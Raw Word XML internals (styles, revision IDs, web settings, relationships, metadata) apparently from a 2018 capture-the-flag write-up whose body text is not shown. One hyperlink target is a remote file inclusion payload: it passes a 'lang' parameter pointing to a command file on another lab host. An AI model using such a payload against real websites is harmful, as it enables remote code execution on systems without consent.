    <w:rsid w:val="00C803B3"/>
    <w:rsid w:val="00C936AF"/>
    <w:rsid w:val="00CB22F5"/>
    <w:rsid w:val="00CD4621"/>
    <w:rsid w:val="00CD5DD5"/>
    <w:rsid w:val="00D106F0"/>
    <w:rsid w:val="00D12A4D"/>
    <w:rsid w:val="00D14B6E"/>
    <w:rsid w:val="00D31324"/>
    <w:rsid w:val="00D3388C"/>
    <w:rsid w:val="00D3718F"/>
    <w:rsid w:val="00D37DD5"/>
    <w:rsid w:val="00D537AF"/>
    <w:rsid w:val="00D57C6A"/>
    <w:rsid w:val="00D60B8C"/>
    <w:rsid w:val="00D712E5"/>
    <w:rsid w:val="00D72EC7"/>
    <w:rsid w:val="00D86B3D"/>
    <w:rsid w:val="00DA7B99"/>
    <w:rsid w:val="00DD71B3"/>
    <w:rsid w:val="00DE39C5"/>
    <w:rsid w:val="00DE73C5"/>
    <w:rsid w:val="00E24C3E"/>
    <w:rsid w:val="00E2747E"/>
    <w:rsid w:val="00E3694E"/>
    <w:rsid w:val="00E407E2"/>
    <w:rsid w:val="00E53EE3"/>
    <w:rsid w:val="00E74A04"/>
    <w:rsid w:val="00E83969"/>
    <w:rsid w:val="00EA18ED"/>
    <w:rsid w:val="00EB014A"/>
    <w:rsid w:val="00EE3501"/>
    <w:rsid w:val="00EF61C9"/>
    <w:rsid w:val="00F06CC2"/>
    <w:rsid w:val="00F11BF3"/>
    <w:rsid w:val="00F1446B"/>
    <w:rsid w:val="00F45483"/>
    <w:rsid w:val="00F643F9"/>
    <w:rsid w:val="00F71E90"/>
    <w:rsid w:val="00F902DB"/>
    <w:rsid w:val="00F92AAF"/>
    <w:rsid w:val="00F957BF"/>
    <w:rsid w:val="00FA1F68"/>
    <w:rsid w:val="00FB3B94"/>
    <w:rsid w:val="00FC5524"/>
    <w:rsid w:val="00FF1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85A588-5E18-4E60-AA4D-A2E44E8E6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5C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31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11AF"/>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B3B94"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C2458F"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009B5C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31B1"/>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E369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94E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E369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426932">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1037200449">
          <w:marLeft w:val="-225"/>
          <w:marRight w:val="-225"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="586236159">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1087767159">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2044595008">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212284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10.10.10.4"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mailto:Doug@10.10.10.3" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ctf/translate/index.php?lang=http://10.10.10.163/command.txt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ct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10.10.10.5"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t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18</Pages>
  <Words>3111</Words>
  <Characters>17735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Huang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jane Huang</cp:lastModifiedBy>
  <cp:revision>160</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-05T23:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-07T17:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>